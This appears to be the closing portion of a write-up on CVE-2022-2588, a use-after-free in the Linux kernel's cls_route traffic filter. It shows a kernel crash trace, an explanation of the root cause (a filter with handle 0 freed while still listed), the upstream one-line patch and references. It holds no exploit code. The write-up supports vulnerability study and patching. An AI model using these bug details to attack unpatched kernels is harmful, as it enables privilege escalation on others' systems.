[ 3136.456484] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
[ 3136.461858] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
[ 3136.464262] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
[ 3136.466742] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
[ 3136.469217] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
[ 3136.471680] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
[ 3136.474156] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
[ 3136.476624] FS:  0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
[ 3136.479227] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3136.481859] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
[ 3136.484757] Call Trace:
[ 3136.487477]  <TASK>
[ 3136.490650]  tcf_exts_destroy+0x2e/0x60
[ 3136.493054]  route4_destroy+0x2ee/0x4d0 [cls_route]
[ 3136.495654]  ? route4_init+0x60/0x60 [cls_route]
[ 3136.498213]  ? __kasan_check_write+0x14/0x20
[ 3136.500784]  ? mutex_unlock+0x81/0xd0
[ 3136.503186]  tcf_proto_destroy+0x54/0x150
[ 3136.505625]  tcf_proto_put+0x5b/0x80
[ 3136.508134]  tcf_chain_flush+0xdf/0x150
[ 3136.510616]  __tcf_block_put+0xea/0x1c0
[ 3136.513100]  tcf_block_put+0xca/0x110
[ 3136.515600]  ? tcf_block_put_ext+0x60/0x60
[ 3136.518110]  htb_destroy+0xed/0x760 [sch_htb]
[ 3136.520595]  ? rcu_exp_wait_wake+0x570/0x570
[ 3136.523096]  ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
[ 3136.525794]  ? htb_reset+0x1dd/0x2a0 [sch_htb]
[ 3136.528551]  ? qdisc_reset+0x1dd/0x280
[ 3136.531346]  qdisc_destroy+0x63/0x150
[ 3136.534156]  qdisc_put+0x6b/0x80
[ 3136.536581]  dev_shutdown+0x129/0x180
[ 3136.539066]  unregister_netdevice_many+0x4dd/0xc50
[ 3136.541621]  ? __kasan_check_read+0x11/0x20
[ 3136.544207]  ? dev_cpu_dead+0x400/0x400
[ 3136.546622]  ? unregister_netdevice_many+0xc50/0xc50
[ 3136.549100]  default_device_exit_batch+0x2df/0x370
[ 3136.551570]  ? __dev_change_net_namespace+0xaf0/0xaf0
[ 3136.554065]  ops_exit_list+0x92/0xa0
[ 3136.556520]  cleanup_net+0x2f3/0x5e0
[ 3136.558804]  ? unregister_pernet_device+0x60/0x60
[ 3136.561209]  ? rtnl_unlock+0xe/0x20
[ 3136.563448]  process_one_work+0x44f/0x740
[ 3136.565930]  worker_thread+0x2bb/0x6f0
[ 3136.568190]  ? process_one_work+0x740/0x740
[ 3136.570541]  kthread+0x179/0x1b0
[ 3136.572620]  ? kthread_complete_and_exit+0x30/0x30
[ 3136.574997]  ret_from_fork+0x22/0x30
[ 3136.577103]  </TASK>
[ 3136.578972] Modules linked in: cls_route sch_htb isofs binfmt_misc nls_iso8859_1 ppdev joydev input_leds parport_pc serio_raw mac_hid parporti
[ 3136.592765] ---[ end trace 0000000000000000 ]---
[ 3136.595224] RIP: 0010:tcf_action_destroy+0x85/0xd0
[ 3136.597666] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
[ 3136.603930] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
[ 3136.606569] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
[ 3136.609403] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
[ 3136.612241] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
[ 3136.615034] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
[ 3136.617558] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
[ 3136.620093] FS:  0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
[ 3136.622819] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3136.625241] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0

Patch

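The vulnerability exists because the code that unlinks the old filter checks not only that the fold pointer is non-NULL but also that its handle is non-zero, while the code that frees it checks only the pointer. A filter whose handle is 0 is therefore freed while it is still linked in the list. The patch makes the unlink step check only the fold pointer, as follows[12].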

diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866..3f935cbbaff6 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
 	rcu_assign_pointer(f->next, f1);
 	rcu_assign_pointer(*fp, f);

-	if (fold && fold->handle && f->handle != fold->handle) {
+	if (fold) {
 		th = to_hash(fold->handle);
 		h = from_hash(fold->handle >> 16);
 		b = rtnl_dereference(head->table[th]);

References

  1. 0xCD4, "kernel-ctf-lab." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/0xCD4/kernel-ctf-lab
  2. "CVE-2022-2588 Detail." nvd.nist.gov, Accessed: May. 26, 2026. [Online]. Available: https://nvd.nist.gov/vuln/detail/cve-2022-2588
  3. Linus Torvalds et al., "Linux kernel", (Version 5.18) [Source Code]. https://github.com/torvalds/linux
  4. "netlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/netlink.7.html
  5. "rtnetlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/rtnetlink.7.html
  6. "Introduction to Netlink." docs.kernel.org, Accessed: May. 26, 2026. [Online]. Available: https://docs.kernel.org/userspace-api/netlink/intro.html
  7. moises-silva, "libnetlink examples." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/moises-silva/libnetlink-examples/tree/master
  8. iproute2, "This is a set of utilities for Linux networking." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/iproute2/iproute2
  9. "unshare(2) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man2/unshare.2.html
  10. "user_namespaces(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/user_namespaces.7.html
  11. "tc(8) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man8/tc.8.html
  12. "[PATCH] net_sched: cls_route: remove from list when handle is 0." lore.kernel.org, Accessed: May. 31, 2026. [Online]. Available: https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u